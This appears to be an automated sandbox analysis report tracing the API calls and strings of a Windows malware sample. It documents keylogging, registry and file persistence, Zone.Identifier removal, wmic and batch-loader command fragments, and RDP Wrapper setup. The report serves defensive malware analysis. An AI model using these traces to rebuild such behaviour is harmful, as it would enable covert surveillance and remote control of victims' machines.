Instruction Fuzzy Hash: 8021AFB1A42229ABDF14CF69DD84BAE77AAFF80360F018151ED10D7344D738EC15DAA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dbkyovyK.pifPID: 6644, Parent PID: 2596COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.2%
Total number of Nodes:	1274
Total number of Limit Nodes:	26

Executed Functions

Function 004066A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 152
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004066DF

Part of subcall function 0040434F: lstrlenA.KERNEL32(75A901C0,75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404358
Part of subcall function 0040434F: lstrlenA.KERNEL32(75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404365
Part of subcall function 0040434F: lstrcpyA.KERNEL32(00000000,75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404378

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00406729
recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00406795

Strings

`, xrefs: 004066C9
nevergonnagiveyouup, xrefs: 004066FB

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
String ID: `$nevergonnagiveyouup
API String ID: 3973575906-2836534208
Opcode ID: 787b6c5a92ca738e642b72d1930a38c2f6715de50a2b525fa6da843ee36625dd
Instruction ID: 2ab1d4815efdcfbbddddc467122994dd5f6a29942a26315e59bb505ff4aada64
Opcode Fuzzy Hash: 787b6c5a92ca738e642b72d1930a38c2f6715de50a2b525fa6da843ee36625dd
Instruction Fuzzy Hash: 4451C0B1D001196BCB14EBA2CC85DEFBB38AF44314F01417EFA16B72C1DB386A44CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406F66 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,0040408F,?,00406CD9,00000000,?,00414EA7,?,?,00417742), ref: 00406F69
RtlFreeHeap.NTDLL(00000000,?,?,00417742), ref: 00406F70

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2c0b3340051de929154d6126d663af0e00b7a12c222a0d8b0ac895e8f76ecd4f
Instruction ID: 05e1aceb7977adf546fb994814ca2cb3edca7a21b0834a8fd3538719a501d3ed
Opcode Fuzzy Hash: 2c0b3340051de929154d6126d663af0e00b7a12c222a0d8b0ac895e8f76ecd4f
Instruction Fuzzy Hash: 79A012B05101009FDE0017B09D1DBC53D189B08702F004014F30D84050C56008008625

Uniqueness

Uniqueness Score: -1.00%

Function 004135D1 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(00000200), ref: 00413669

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: EntryPoint
String ID:
API String ID: 3225343992-0
Opcode ID: a7ff941421754e8fe714653259b37104989f48b2ebcdbb3193b226d7d45013df
Instruction ID: 0dbf1e3ff5d11d325e7c8cd127dc96c63bf69258fb2611769ee615e670e7cd5f
Opcode Fuzzy Hash: a7ff941421754e8fe714653259b37104989f48b2ebcdbb3193b226d7d45013df
Instruction Fuzzy Hash: 5721A372E04208ABCF15DF99D8815EEF7B5AF94310F15806BE805BB351D7746E828B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD09 Relevance: 44.0, APIs: 17, Strings: 8, Instructions: 284
keyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAsyncKeyState.USER32(00000010), ref: 0040AD45
CallNextHookEx.USER32(00000000,?,?,?), ref: 0040B11F

Part of subcall function 0040B172: GetForegroundWindow.USER32(?,?,?), ref: 0040B19B
Part of subcall function 0040B172: GetWindowTextW.USER32(00000000,?,00000104), ref: 0040B1AE
Part of subcall function 0040B172: lstrlenW.KERNEL32(00551EE8,{Unknown},?,?), ref: 0040B212
Part of subcall function 0040B172: CreateFileW.KERNEL32(34B40000,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 0040B280
Part of subcall function 0040B172: lstrlenW.KERNEL32(00419D10,?,?), ref: 0040B2A5
Part of subcall function 0040B172: WriteFile.KERNEL32(0000048C,00419D10,00000000,005520F0,00000000,?,?), ref: 0040B2B8
Part of subcall function 0040B172: lstrlenW.KERNEL32(?,?,?), ref: 0040B2CB

Strings

[TAB], xrefs: 0040B0B7
[CTRL], xrefs: 0040AF14
[DEL], xrefs: 0040AE7A
[ALT], xrefs: 0040B10E
[CAPS], xrefs: 0040B107
[ENTER], xrefs: 0040B0B0
[ESC], xrefs: 0040B100
[BKSP], xrefs: 0040B0BE

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlen$FileWindow$AsyncCallCreateForegroundHookNextStateTextWrite
String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[TAB]
API String ID: 1077999596-2535331874
Opcode ID: 1120f924a4239a05b723a00745b50559aa83b20577d29a36bf101e2439946222
Instruction ID: 133472a9b51cee62362a31ae10ddbd2399f765217dc21996adc431401ddd7d41
Opcode Fuzzy Hash: 1120f924a4239a05b723a00745b50559aa83b20577d29a36bf101e2439946222
Instruction Fuzzy Hash: F991C132E04215A7CB289628A93A7F66621D781380F10C937DA177BBD9C77C4D8692CF

Uniqueness

Uniqueness Score: -1.00%

Function 004174CD Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 184
registrysleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004174FB
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00417517

Part of subcall function 00415E27: EntryPoint.DBKYOVYK(02800000,?,?,00000000,?,?,00417531), ref: 00415E37
Part of subcall function 00415E27: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00417531), ref: 00415E54
Part of subcall function 00415E27: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00417531), ref: 00415E67
Part of subcall function 00415E27: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00417531), ref: 00415E78
Part of subcall function 00415E27: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,00417531), ref: 00415E85

EntryPoint.DBKYOVYK(00000020,0000215A,?), ref: 00417556

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417574
GetLastError.KERNEL32 ref: 0041757F
RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004175B9
RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 004175D8
RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 004175ED
RegCloseKey.ADVAPI32(?), ref: 004175F3
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 00417649
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 0041765C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0041766B
Sleep.KERNEL32(00000BB8), ref: 004176B1

Part of subcall function 004158F7: GetModuleFileNameW.KERNEL32(00000000,00551C00,00000208,00000000,00000000,?,?,?,0040683C,75A901C0,00000000,00000000,?,?,?,00000000), ref: 00415913
Part of subcall function 004158F7: IsUserAnAdmin.SHELL32 ref: 00415919
Part of subcall function 004158F7: FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,0040683C,75A901C0,00000000,00000000,?,?,?,00000000), ref: 00415942
Part of subcall function 004158F7: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,0040683C,75A901C0,00000000,00000000,?,?,?,00000000,?,75A901C0), ref: 0041594C
Part of subcall function 004158F7: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,0040683C,75A901C0,00000000,00000000,?,?,?,00000000,?,75A901C0), ref: 00415956
Part of subcall function 004158F7: LockResource.KERNEL32(00000000,?,?,?,?,0040683C,75A901C0,00000000,00000000,?,?,?,00000000,?,75A901C0,00000000), ref: 0041595D

Part of subcall function 00414EEF: CopyFileW.KERNEL32(?,?,00000000,?,?,004194E4,00000000,?,?,?,?,?,75A901C0,00000000), ref: 00414F96
Part of subcall function 00414EEF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?,?,?,75A901C0,00000000), ref: 00414FD4

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 004149A8: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,75A901C0,00000000), ref: 004149E3

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Strings

MaxConnectionsPer1_0Server, xrefs: 004175CF
Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004175AF
MaxConnectionsPerServer, xrefs: 004175E4
\Microsoft Vision\, xrefs: 0041764F

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: File$Create$Resource$CloseEntryFindHeapModuleNamePointProcessValue$AdminAllocateChangeCopyCountDirectoryErrorEventFolderFreeLastLoadLockNotificationOpenPathReadSizeSizeofSleepTickUserVirtuallstrcatlstrcpy
String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
API String ID: 2387029575-2552559493
Opcode ID: b82b8841fc2ff8ccefe1ceb87bc277168a235e81c50268bfa4ce03c30c999832
Instruction ID: b8144df1bb1856d89875472839c98e06d6878c422665708668403525bb11096e
Opcode Fuzzy Hash: b82b8841fc2ff8ccefe1ceb87bc277168a235e81c50268bfa4ce03c30c999832
Instruction Fuzzy Hash: 69614FB1508345AFD720EF61DC959EF77A8EB84348F00493FF295921A1DB389984CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00414EEF Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 294
fileregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413960: EntryPoint.DBKYOVYK(000007D0,?,?,00417610,?,0041538F,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 0041396D
Part of subcall function 00413960: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,?,00417610,?,0041538F,?,75A901C0,00000000,?,?,?,?,00417610), ref: 00413981

Part of subcall function 004044C4: EntryPoint.DBKYOVYK(0000000A,?,75A901C0,?,?,?,?,?,?,?,?,?,?,00414F10,?,75A901C0), ref: 004044DB

Part of subcall function 00414D25: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000,?,?,00414F1E,?,?), ref: 00414D44

Part of subcall function 00414D63: RegCloseKey.KERNEL32(?,?,00414EE6,?,?,00417742), ref: 00414D6D

CopyFileW.KERNEL32(?,?,00000000,?,?,004194E4,00000000,?,?,?,?,?,75A901C0,00000000), ref: 00414F96
DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,00000003,?,?,75A901C0,00000000), ref: 00415017
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?,?,?,75A901C0,00000000), ref: 00414FD4

Part of subcall function 00414DEE: RegSetValueExW.ADVAPI32(?,75A901C0,00000000,?,?,?,?,?,0041522A,00000000,00000000,00000001,?,?,?,?), ref: 00414E0D

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

RegOpenKeyExW.KERNEL32(80000001,?,00000000,000F003F,?,?,?,?,?,?,75A901C0,00000000), ref: 00415040
SHGetKnownFolderPath.SHELL32(00419390,00000000,00000000,?,?,?,?,?,?,75A901C0,00000000), ref: 0041505B
CopyFileW.KERNEL32(?,00000000,00000000,?,?,:start,0041C678,00000000,wmic process call create '",00000000,00000000,?,") do %%A,:start,00000000,for /F "usebackq tokens=*" %%A in ("), ref: 0041517B
lstrlenW.KERNEL32(?,?,?,?,?,?,75A901C0,00000000), ref: 004151C2
lstrcpyW.KERNEL32(00000000,?), ref: 004151D9
DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,?,75A901C0,00000000), ref: 00415271

Part of subcall function 00413915: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000,?,?,?), ref: 00413946

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 004133FB: SHCreateDirectoryExW.SHELL32(00000000,?,00000000,00414F62,00000000,?,?,?,?,?,75A901C0,00000000), ref: 00413401

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 004042C5: lstrcatW.KERNEL32(00000000,75A901C0), ref: 004042F5

Strings

:start, xrefs: 00415091, 00415128
:Zone.Identifier, xrefs: 00414FF6, 00415250
wmic process call create '", xrefs: 00415104
for /F "usebackq tokens=*" %%A in (", xrefs: 00415079
") do %%A, xrefs: 0041509D
\Documents:ApplicationData, xrefs: 004150F8
\programs.bat, xrefs: 0041506C

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: File$lstrcpy$lstrlen$CopyCreateDeleteEntryFolderOpenPathPoint$CloseDirectoryFreeKnownModuleNameSpecialValueVirtuallstrcat
String ID: ") do %%A$:Zone.Identifier$:start$\Documents:ApplicationData$\programs.bat$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
API String ID: 3943553085-2608805497
Opcode ID: 7eb9c70a5d6ee3c1881972ac96f5d1f724a34c94bb84979706091f286e17254c
Instruction ID: 1b0dabdf6f4cfc389d5f4dcd42636e11791d04af74f685669f75e7b2fd185dff
Opcode Fuzzy Hash: 7eb9c70a5d6ee3c1881972ac96f5d1f724a34c94bb84979706091f286e17254c
Instruction Fuzzy Hash: B8B13C71A0010AABCB04EFA1DC95DEE7779BFD4344B10046EF916671D2DF389A45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB70 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 132
windowstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 0040AB81
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,005520E8), ref: 0040ABC8
lstrcatW.KERNEL32(005520E8,\Microsoft Vision\), ref: 0040ABE2
GetLocalTime.KERNEL32(?), ref: 0040ABE9
wsprintfW.USER32 ref: 0040AC1D
lstrcatW.KERNEL32(005520E8,?), ref: 0040AC34
CreateFileW.KERNEL32(34B40000,10000000,00000001,00000000,00000002,00000080,00000000,00552108), ref: 0040AC60
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040AC70

Part of subcall function 00415E27: EntryPoint.DBKYOVYK(02800000,?,?,00000000,?,?,00417531), ref: 00415E37
Part of subcall function 00415E27: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00417531), ref: 00415E54
Part of subcall function 00415E27: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00417531), ref: 00415E67
Part of subcall function 00415E27: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00417531), ref: 00415E78
Part of subcall function 00415E27: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,00417531), ref: 00415E85

Part of subcall function 004147A3: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,74E2F770,00000000,?,?,?,?,0040AC91), ref: 004147CF

GetMessageA.USER32(0000000D,0040ACF4,00000000,00000000), ref: 0040ACB8
KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0040ACE3

Part of subcall function 0041473A: lstrcmpA.KERNEL32(?,E[A,?,74DF0F00,00415B45), ref: 00414773

TranslateMessage.USER32(?), ref: 0040ACCA
DispatchMessageA.USER32(?), ref: 0040ACD5

Strings

SetWindowsHookExA, xrefs: 0040AC96
c:\windows\system32\user32.dll, xrefs: 0040AC7E
\Microsoft Vision\, xrefs: 0040ABDC
%02d-%02d-%02d_%02d.%02d.%02d, xrefs: 0040AC17

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: File$Message$ChangeCloseCreateFindNotificationlstrcat$AllocCallbackDispatchDispatcherEntryFolderHandleLocalModulePathPointReadSizeTimeTranslateUserVirtuallstrcmpwsprintf
String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
API String ID: 1458967102-3884914687
Opcode ID: ff0e34c1e9a0752e588136902620919e5b428dc1f1f549d39d5fc5b464748b19
Instruction ID: 59b36a1bae3b2f458adffd9aaabe2e051b23e08874b26aab529e134e5071cdd5
Opcode Fuzzy Hash: ff0e34c1e9a0752e588136902620919e5b428dc1f1f549d39d5fc5b464748b19
Instruction Fuzzy Hash: 0D417271904304BBD750DBA6DC49EAB77ECFBC8704F44882AF949E3191E638D914C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B172 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 148
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32(?,?,?), ref: 0040B19B
GetWindowTextW.USER32(00000000,?,00000104), ref: 0040B1AE
lstrlenW.KERNEL32(00551EE8,{Unknown},?,?), ref: 0040B212
lstrcpyW.KERNEL32(00551EE8,?), ref: 0040B25F
CreateFileW.KERNEL32(34B40000,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 0040B280
lstrlenW.KERNEL32(00419D10,?,?), ref: 0040B2A5
WriteFile.KERNEL32(0000048C,00419D10,00000000,005520F0,00000000,?,?), ref: 0040B2B8
lstrlenW.KERNEL32(?,?,?), ref: 0040B2CB
WriteFile.KERNEL32(0000048C,?,00000000,00552100,00000000,?,?), ref: 0040B2E6
lstrlenW.KERNEL32(00419D10,?,?), ref: 0040B2F6
WriteFile.KERNEL32(0000048C,00419D10,00000000,005520F0,00000000,?,?), ref: 0040B309
lstrlenW.KERNEL32(?,?,?), ref: 0040B317
WriteFile.KERNEL32(0000048C,?,00000000,005520F0,00000000,?,?), ref: 0040B32A
FindCloseChangeNotification.KERNEL32(0000048C,?,?), ref: 0040B334

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 004042C5: lstrcatW.KERNEL32(00000000,75A901C0), ref: 004042F5

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Strings

{Unknown}, xrefs: 0040B1F7

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlen$File$Write$Windowlstrcpy$ChangeCloseCreateFindForegroundFreeNotificationTextVirtuallstrcat
String ID: {Unknown}
API String ID: 3446860228-4054869793
Opcode ID: f1d569bfe574da3ca423e0abc007cfa35ea5f8fef0bf5922a5eebe940f42d04f
Instruction ID: 8b902e095fd5ab821e913c7bf31042976ffc78f7f009d6cefa2fb8a6fa3a4171
Opcode Fuzzy Hash: f1d569bfe574da3ca423e0abc007cfa35ea5f8fef0bf5922a5eebe940f42d04f
Instruction Fuzzy Hash: EF518C71A00204AFCB00EFA5DC8AFDA7768EF94304F9484B9F909A72A1D774AD50DB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041237D Relevance: 19.6, APIs: 3, Strings: 10, Instructions: 129
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00553050), ref: 00412389

Part of subcall function 00406FA7: GetProcessHeap.KERNEL32(00000000,000000F4,0041424F,?,75A901C0,00000000,00406ACF,?,75A901C0,00000000), ref: 00406FAA
Part of subcall function 00406FA7: HeapAlloc.KERNEL32(00000000,?,75A901C0,00000000), ref: 00406FB1

lstrlenW.KERNEL32(?,\rfxvmt.dll,\Microsoft DN1,\Microsoft DN1,00000000,00000000,%windir%\System32,%ProgramFiles%,TermService), ref: 004124FA
lstrcpyW.KERNEL32(00000000), ref: 00412518

Part of subcall function 00404201: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00404234

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Strings

%windir%\System32, xrefs: 00412424
\Microsoft DN1, xrefs: 004124BB, 004124C2, 004124C8
P0U, xrefs: 00412546
%ProgramW6432%, xrefs: 00412463
%ProgramFiles%, xrefs: 00412418, 0041248E
\rfxvmt.dll, xrefs: 004124D3
x0U, xrefs: 004123F8
TermService, xrefs: 004123FD
\sqlmap.dll, xrefs: 0041252D, 00412534, 0041253A
\rdpwrap.ini, xrefs: 0041251E

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heaplstrcpy$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrlen
String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$P0U$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll$x0U
API String ID: 3036115924-3400825180
Opcode ID: 604369fd6e35d4dd0f13e44e6035b35572ddee57f7d2013e80620bd14dc16a58
Instruction ID: 23394c22177b94ec15529c5c42ebb23ea9b1b83c04c2a38566927932c127b9a8
Opcode Fuzzy Hash: 604369fd6e35d4dd0f13e44e6035b35572ddee57f7d2013e80620bd14dc16a58
Instruction Fuzzy Hash: 8C41CC7070030067C705BF65983A56EBAA5EFD4795700002FF90EA72F1DF785A45DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00417BBE Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EntryPoint.DBKYOVYK(00000019), ref: 00417C9D

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

EntryPoint.DBKYOVYK(00000019,00000019), ref: 00417CA6
EntryPoint.DBKYOVYK(00000019,00000019,00000019), ref: 00417CAF
EntryPoint.DBKYOVYK(00000019,00000019,00000019,00000019), ref: 00417CB8
EntryPoint.DBKYOVYK(00000019,00000019,00000019,00000019,00000019), ref: 00417CC2
EntryPoint.DBKYOVYK(00000019,00000019,00000019,00000019,00000019,00000019), ref: 00417CCC

Part of subcall function 0040434F: lstrlenA.KERNEL32(75A901C0,75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404358
Part of subcall function 0040434F: lstrlenA.KERNEL32(75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404365
Part of subcall function 0040434F: lstrcpyA.KERNEL32(00000000,75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404378

Part of subcall function 00413AEC: CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 00413B07

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Strings

< U, xrefs: 00417D2B
X U, xrefs: 00417D48
U, xrefs: 00417D0E
t U, xrefs: 00417D67

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: EntryPoint$Heaplstrlen$AllocateCreateEventFreeProcessVirtuallstrcpy
String ID: U$< U$X U$t U
API String ID: 655462647-2692483259
Opcode ID: 3a761f32c0efd2ed0e6be2f2ae2ad67d89c927018e071a290da7f0175667e3cc
Instruction ID: b37927ddff63be40ce63b2d508c3fdda68f920261d59dddfecf526ea45b038c3
Opcode Fuzzy Hash: 3a761f32c0efd2ed0e6be2f2ae2ad67d89c927018e071a290da7f0175667e3cc
Instruction Fuzzy Hash: CF51ABB0902305DEC794EF7AEC696AA3BF5AB59346F10043FA109E72F1EA341548EF14

Uniqueness

Uniqueness Score: -1.00%

